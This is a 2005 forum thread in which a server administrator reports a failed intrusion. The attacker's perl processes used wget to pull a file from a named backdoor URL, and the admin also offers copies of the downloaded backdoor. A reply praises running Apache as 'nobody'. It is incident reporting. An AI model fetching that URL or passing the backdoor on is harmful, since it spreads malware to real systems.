The Nightstar Zoo

Nightstar IRC Network - irc.nightstar.net
It is currently Fri Mar 24, 2017 3:05 pm

All times are UTC - 6 hours [ DST ]




Post new topic Reply to topic  [ 2 posts ] 
Author Message
PostPosted: Thu May 12, 2005 11:53 am 
Offline
Knight of Daisies, Tulip Slayer
User avatar

Joined: Sat May 11, 2002 5:39 pm
Posts: 316
At 22:11 Central time, someone attempted to exploit a bug somewhere in the system - my guess is that they hit the PHPNuke or PHPBB code on Nightstar.

The hack spawned off two perl processes, one called ' sik ' and the other called ' [EntropyClient] '.

Between them, they maxed out the CPU, and somehow maxed out the bandwidth as well.

Once connected, the process used wget to attempt to find this file.

http://myshellz.com/xpl/backdoors/bash

(which does exist, I haven't had a chance to look at it - anyone that wants a copy, let me know - I downloaded it.)

Luckily, because I'm reasonably paranoid about apache, the process they were running as was 'nobody', which has no rights to be able to escalate itself and replace /bin/bash.

I was actually aware that this was going on within approximately 60 seconds, and had logged into the box to check it. Unfortunately, right as I was killing the processes, they maxed out the bandwidth and my command couldn't go through. I had to manually go to the box.

By 23:30, I'd reached the box, killed the processes, and gotten everything restarted.

However - as part of trying to make sure they couldn't repeat that, I put in updates for apache, php, and several other packages. The PHP package upgrade conflicted with the version of MySQL I put in, so I didn't realize that the zoo wasn't functioning.

This morning, I identified the problem and reverted the php.

However, the code in the zoo will probably have to be looked at.

BW

_________________
----------------------------------------------------------
I'll get a life when it is proven and substantiated to be better than what I am currently experiencing.


Top
 Profile  
 
PostPosted: Sun Jul 24, 2005 7:20 pm 
Some long-forgotten guide to Apache wrote:
Question: Why does Apache run as "nobody" by default?
Answer: Because it's the only webserver with a <blank>ing clue.


It's nice to see people taking good security precautions in building their webservers. Restores a little of your faith in humanity's sanity, so to speak.


Top
  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 2 posts ] 

All times are UTC - 6 hours [ DST ]


Who is online

Users browsing this forum: No registered users and 1 guest


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum

Search for:
Jump to:  
cron
Powered by phpBB® Forum Software © phpBB Group